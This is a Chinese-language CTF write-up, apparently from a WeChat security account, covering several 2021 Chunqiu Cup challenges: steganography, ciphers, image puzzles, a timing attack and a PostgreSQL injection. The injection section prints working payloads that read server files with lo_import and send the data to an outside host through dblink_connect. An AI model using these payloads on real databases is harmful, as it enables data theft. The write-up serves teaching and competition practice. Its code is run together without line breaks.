点击蓝字 · 关注我们
签到
万物皆有"FUN",电脑扫"FUN"活动,提供大写的"FUN"字样,即可获取flag~
解题思路,虚拟摄像头
设备管理器禁用本地摄像头
然后下载虚拟摄像头
添加一个fun的图片
重新运行,即可获取flag
十二宫
但愿你能解出密文,不然我就会继续犯罪:)
^#@$@#()/>@?==%1(!)>(*+3<#86@-7$^.4&)8%#5&6!=%1#$-$+5&?#!.03!%=@=1010?(*~#??.+)%&.7^8=1%*^=$5$7@@8>&*99@0185(+7)<%3#@^4&@@<.)$3*#%%<<*++.@.?=~**+!==65^@&
解密payload,然后规则是从第一个开始,依次往下一行往右两格,直接上脚本:
en_s = "^#@$@#()/>@?==%1(!)>(*+3<#86@-7$^.4&)8%#5&6!=%1#$-$+5&?#!.03!%=@=1010?(*~#??.+)%&.7^8=1%*^=$5$7@@8>&*99@0185(+7)<%3#@^4&@@<.)$3*#%%<<*++.@.?=~**+!==65^@&"width = 17height = 9en_str = []for i in range(height):en_str.append(str(en_s[i*width:(i+1)*width]))de_str = ""sign_width = 0sign_height = 0for i in range(height*width):de_str += en_str[sign_height][sign_width]sign_width = (sign_width+2)%widthsign_height = (sign_height+1)%heightprint(de_str)
结果
^>%..@3*&#(#0+@#+.@*53)8@+@$+&!%>^&.@36%&&4@?#<!=.*9@=(#=@79@<~)8%=^=0.*/611811)*>@#00%8$+@-$1?*53!?7-+(^(*==$$5*=+#==^4&~$7%6%.&?#5)%51!)#?$<<^()8!?7%<@错误!未指定文件名。
2019-nCoV
wav用 silenteye解密
去hint的第二个网站去解密
98eb1b1760bcc837934c8695a1cee923
使用工具mp3stego
Decode.exe -X -P98eb1b1760bcc837934c8695a1cee923 cov.mp3
解密压缩包
但是这里有一个坑,会遇到有几个相同的频次,有些得倒一下顺序,最后顺序
LGASTRIQKNDPFEVYMWHCCOMBAT
维吉尼亚解密
snowww
图片末尾有个压缩包,把压缩包提取出来,有matlab编写的encode代码和原来的图片,算法基本一样,编写了decode.m:
1. clc;clear;close all;2. alpha = 80;3.4. im = double(imread('original.jpg'))/255;5. imsize = size(im)6. TH=zeros(imsize(1)*0.5,imsize(2),imsize(3));7. TH1 = TH;8. FA=fft2(im);9. FAO=imread('snow.jpg')10. FA2=fft2(FAO);11. load('encode.mat')12. G=(FA2-FA)/alpha;13. GG=G;14. for i=1:imsize(1)*0.515. for j=1:imsize(2)16. GG(M(i),N(j),:)=G(i,j,:);17. end18. end19. for i=1:imsize(1)*0.520. for j=1:imsize(2)21. GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:);22. end23. end24. figure,imshow(GG);title('extracted watermark');25. %imwrite(uint8(GG),'extracted watermark.jpg');
得到flag:flag{c93fd2a3-103f-4539-9a51-ad5a6437daa1}
puzzle
# python3import cv2from PIL import Imageimport numpy as npimport osimport shutilimport threading# 读取目标图片source = cv2.imread(r"F:testdemo.jpg")# 拼接结果target = Image.fromarray(np.zeros(source.shape, np.uint8))# 图库目录dirs_path = r"F:testoutput"# 差异图片存放目录dst_path = r"F:test222"def match(temp_file):# 读取模板图片template = cv2.imread(temp_file)# 获得模板图片的高宽尺寸theight, twidth = template.shape[:2]# 执行模板匹配,采用的匹配方式cv2.TM_SQDIFF_NORMEDresult = cv2.matchTemplate(source, template, cv2.TM_SQDIFF_NORMED)# 归一化处理cv2.normalize(result, result, 0, 1, cv2.NORM_MINMAX, -1)# 寻找矩阵(一维数组当做向量,用Mat定义)中的最大值和最小值的匹配结果及其位置min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)target.paste(Image.fromarray(template), min_loc)return abs(min_val)class MThread(threading.Thread):def __init__(self, file_name):threading.Thread.__init__(self)self.file_name = file_namedef run(self):real_path = os.path.join(dirs_path, k)rect = match(real_path)if rect > 1e-10:print(rect)shutil.copy(real_path, dst_path)count = 0dirs = os.listdir(dirs_path)threads = []for k in dirs:if k.endswith('JPG'):count += 1print("processing on pic" + str(count))mt = MThread(k)mt.start()threads.append(mt)else:continue# 等待所有线程完成for t in threads:t.join()target.show()target.save(r"F:testwsjqq.jpg")
borrow time
I wanna borrow sometime.
curl --http2-prior-knowledge http://8.140.110.118/<html lang="en"><head><meta charset="UTF-8"><title>Login</title><link rel="stylesheet" type="text/css" href="/static/login.css"/></head><body><div id="login"><h1>Login</h1><form method="post"><input type="password" required="required" placeholder="口令" name="secret"></input><button class="but" type="submit">登录</button></form></div></body></html><!-- /src --><PAYLOAD2:curl --http2-prior-knowledge http://8.140.110.118/src#!/usr/bin/env pythonimport osimport timeimport hashlibfrom flask import Flask, render_template, requestapp = Flask(__name__)FLAG = os.environ["ICQ_FLAG"]SECRET = hashlib.sha1(FLAG.encode()).hexdigest()[:10]SLEEP_TIME = 10 ** -10@app.route("/", methods=['POST', 'GET'])def login():if request.method == 'GET':return render_template('login.html')else:secret = request.form['secret']if len(secret) != len(SECRET):return "^_^"for a, b in zip(secret, SECRET):if a == "*":continueelif a != b:return "INCORRECT"else:time.sleep(SLEEP_TIME)if "*" in secret:return "INCORRECT"return FLAG@app.route("/src")def src():with open(__file__) as f:return f.read()
githubexp
python3 1.py
f注入
启动一个docker 镜像
抓取本地网卡流量
查询版本
查询OID
看到oid查询OID ,由于长度的限制我们使用substring 分块传输
1' UNION SELECT 1,(SELECT dblink_connect('host=123.57.131.184 port=9595 user=postgres'||(select substring(encode(lo_get(16441),'base64'),1,15))||' password=password dbname=postgres')) --PEZpbGVzTWF0Y2g 1---151' UNION SELECT 1,(SELECT dblink_connect('host=123.57.131.184 port=9595 user=postgres'||(select substring(encode(lo_get(16441),'base64'),15,30))||' password=password dbname=postgres')) --gInB1c2hGMW40QW5LIj4KICBTZXRIY 15--30
加在一块使用base64解密
获取到flag的名字,然后再次尝试去查询。
先绑定OID
1' UNION SELECT(select lo_import('/var/www/html/pushF1n4AnK')),'1' -
查询oid
1' UNION SELECT 1,(SELECTdblink_connect('host=123.57.131.184 port=9595 user=postgres' || (SELECTstring_agg(cast(l.oid as text), ':') FROM pg_largeobject_metadata l) || 'password=password dbname=postgres')) --
获取uid的数据
1' UNION SELECT 1,(SELECT dblink_connect('host=123.57.131.184 port=9595 user=postgres'||(select substring(encode(lo_get(16439),'base64'),1,15))||' password=password dbname=postgres')) --
PD9waHAKJGZsYWc
1' UNION SELECT 1,(SELECT dblink_connect('host=123.57.131.184 port=9595 user=postgres'||(select substring(encode(lo_get(16439),'base64'),15,30))||' password=password dbname=postgres')) --
9ImZsYWd7MzRlZDc0MzctMDViNS00
1' UNION SELECT 1,(SELECT dblink_connect('host=123.57.131.184 port=9595 user=postgres'||(select substring(encode(lo_get(16439),'base64'),30,45))||' password=password dbname=postgres')) --Dc0MzctMDViNS00NTU3LTkwMTEtNGFiOTY3NmRiYzEwf
拼接flag
PD9waHAKJGZsYWc9ImZsYWd7MzRlZDc0MzctMDViNS00NTU3LTkwMTEtNGFiOTY3NmRiYzEwfS
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):2021年“春秋杯”新年欢乐赛 部分WP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论